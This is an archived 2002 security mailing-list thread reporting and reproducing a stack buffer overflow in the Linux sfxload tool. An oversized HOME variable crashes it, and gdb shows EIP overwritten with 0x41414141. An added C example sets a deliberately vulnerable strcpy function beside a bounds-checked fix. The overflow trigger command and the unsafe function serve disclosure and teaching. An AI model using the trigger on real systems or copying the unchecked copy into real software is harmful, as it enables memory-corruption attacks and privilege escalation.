From: Gabriel A. Maggiotti (gmaggiot@ciudad.com.ar)
Date: Thu Jan 03 2002 - 14:53:30 CST


    I successfully reproduced it in my box

    <quote>
    [root@tribilin /root]# cat /etc/issue

    Red Hat Linux release 7.0 (Guinness)
    Kernel 2.2.16-22 on an i586

    [root@tribilin /root]# export HOME=`perl -e 'print "A" x 10235'`
    [root@tribilin /root]# ./sfxload
    Segmentation fault (core dumped)
    </quote>

    Regards,
    Gabriel A. Maggiotti

    Email: gmaggiot@ciudad.com.ar
    Webpage: http://qb0x.net

    ----- Original Message -----
    From: "l0rt" <simonsnosoft.com>
    To: <vuln-dev@securityfocus.com>
    Sent: Wednesday, January 02, 2002 5:53 PM
    Subject: sfxload issues.

    >
    > Vendor : http://members.tripod.de/iwai/awedrv.html
    > Program: sfxload
    > OS : RH 7.1
    > Version: 0.4.3
    > SUID : No
    > SGID : No
    > Issue : This may get called by an suid helper binary which would allow
    > a normal user to gain some more privs.
    >
    > --------------------------------------------------------------------------
    >
    > Details:
    > [raven] /u1/cores/testing/bin> export HOME=`perl -e 'print "A" x 10235'`
    >
    > /* I just set HOME to be [10235] A's */
    >
    > [raven] /u1/cores/testing/bin> sfxload
    > Segmentation fault (core dumped)
    >
    > /* When sfxload is run it reads in the HOME var and cores!!! */
    >
    > [raven] /u1/cores/testing/bin/sfxload> gdb /bin/sfxload /* gdb */
    > GNU gdb 5.0rh-5 Red Hat Linux 7.1
    > Copyright 2001 Free Software Foundation, Inc.
    > GDB is free software, covered by the GNU General Public License, and you
    > are
    > welcome to change it and/or distribute copies of it under certain
    > conditions.
    > Type "show copying" to see the conditions.
    > There is absolutely no warranty for GDB. Type "show warranty" for
    > details.
    > This GDB was configured as "i386-redhat-linux"...(no debugging symbols
    > found)...
    > (gdb) core core
    > Core was generated by `AAAAAAAA'.
    > Program terminated with signal 11, Segmentation fault.
    > Reading symbols from /lib/i686/libm.so.6...done.
    > Loaded symbols for /lib/i686/libm.so.6
    > Reading symbols from /lib/i686/libc.so.6...done.
    > Loaded symbols for /lib/i686/libc.so.6
    > Reading symbols from /lib/ld-linux.so.2...done.
    > Loaded symbols for /lib/ld-linux.so.2
    > #0 0x41414141 in ?? ()
    > (gdb) bt
    > #0 0x41414141 in ?? ()
    > Cannot access memory at address 0x41414141
    > (gdb)
    >
    > /* EIP gets killed */
    >
    >
    >
    >
    > --
    > Regards,
    > l0rt
    >
    > ------------------------------------------------------------
    > "The only way to get rid of temptation is to give in to it."
    >
    >
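The bug class both posters reproduce (an environment string copied into a fixed-size stack buffer with no length check, so a ~10 KB HOME overwrites the saved return address and the process dies with EIP = 0x41414141), shown as an added example beside a bounds-checked replacement. This is not sfxload's source and not either poster's code; the function names, the 256-byte buffer and the `.sfxloadrc` suffix are assumptions.

```c
/* Added example, not sfxload's own code: the unchecked-copy pattern the
 * crash above indicates, and a hardened version that refuses oversized
 * input instead of truncating it. Names and sizes are assumptions. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PATH_BUF 256

/* Vulnerable pattern: strcpy() trusts whatever length $HOME has. A HOME
 * of 10235 bytes overruns `path`, clobbers the saved return address and
 * the program faults at 0x41414141, exactly as in the gdb session. */
int build_config_path_unsafe(const char *home, char *out, size_t outsz)
{
    char path[PATH_BUF];
    strcpy(path, home);                 /* no bound check: the overflow */
    strcat(path, "/.sfxloadrc");
    strncpy(out, path, outsz);
    out[outsz - 1] = '\0';
    return 0;
}

/* Hardened replacement: validate the input length against the destination
 * first, reject (rather than silently truncate) anything that does not
 * fit, and build the string with snprintf() so no write can exceed outsz. */
int build_config_path_safe(const char *home, char *out, size_t outsz)
{
    static const char suffix[] = "/.sfxloadrc";   /* sizeof includes NUL */
    if (home == NULL || home[0] == '\0')
        return -1;                      /* HOME unset or empty */
    if (strlen(home) + sizeof suffix > outsz)
        return -1;                      /* would not fit: refuse */
    int n = snprintf(out, outsz, "%s%s", home, suffix);
    return (n < 0 || (size_t)n >= outsz) ? -1 : 0;
}

int main(void)
{
    char out[PATH_BUF];
    /* Reads the real environment; an oversized HOME is rejected, not copied. */
    if (build_config_path_safe(getenv("HOME"), out, sizeof out) != 0) {
        fprintf(stderr, "HOME is unset or too long; refusing to continue\n");
        return 1;
    }
    printf("config file: %s\n", out);
    return 0;
}
```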